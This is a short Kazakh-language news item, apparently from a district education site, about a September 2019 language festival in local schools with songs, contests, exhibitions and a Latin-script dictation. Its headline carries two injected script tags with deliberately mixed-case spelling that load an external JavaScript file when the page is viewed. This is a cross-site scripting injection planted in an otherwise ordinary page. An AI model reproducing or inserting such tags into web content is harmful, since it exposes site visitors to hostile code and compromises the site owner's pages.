Қазақстан халықтарының тілдер онкүндігі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

17.09.2019

Қазақстан Республикасының Тілдер күніне арналған дәстүрлі жыл сайынғы онкүндік 5-16 қыркүйек аралығында өтті. Тілдер онкүндігі ауданның барлық мектептерінде салтанатты саптүзеуден басталды, онда оқушылар өлеңдер оқыды, қазақ, украин, ағылшын және орыс тілдерінде әндер орындады.

Онкүндік аясында дөңгелек үстелдер, байқаулар мен сайыстар, концерттік бағдарламалар, ашық сабақтар, ертеңгіліктер, кітап көрмелері, дискуссиялар, суреттер, шығармалар байқауы, ұлттық ойындар, кездесулер, әдеби-музыкалық кештер, фотокөрмелер, сондай-ақ латын графикасына көшу бойынша жалпыұлттық диктант өткізілді.

Просмотров: 1106


Пікір қосу



Деректерді қолтаңбаға қосу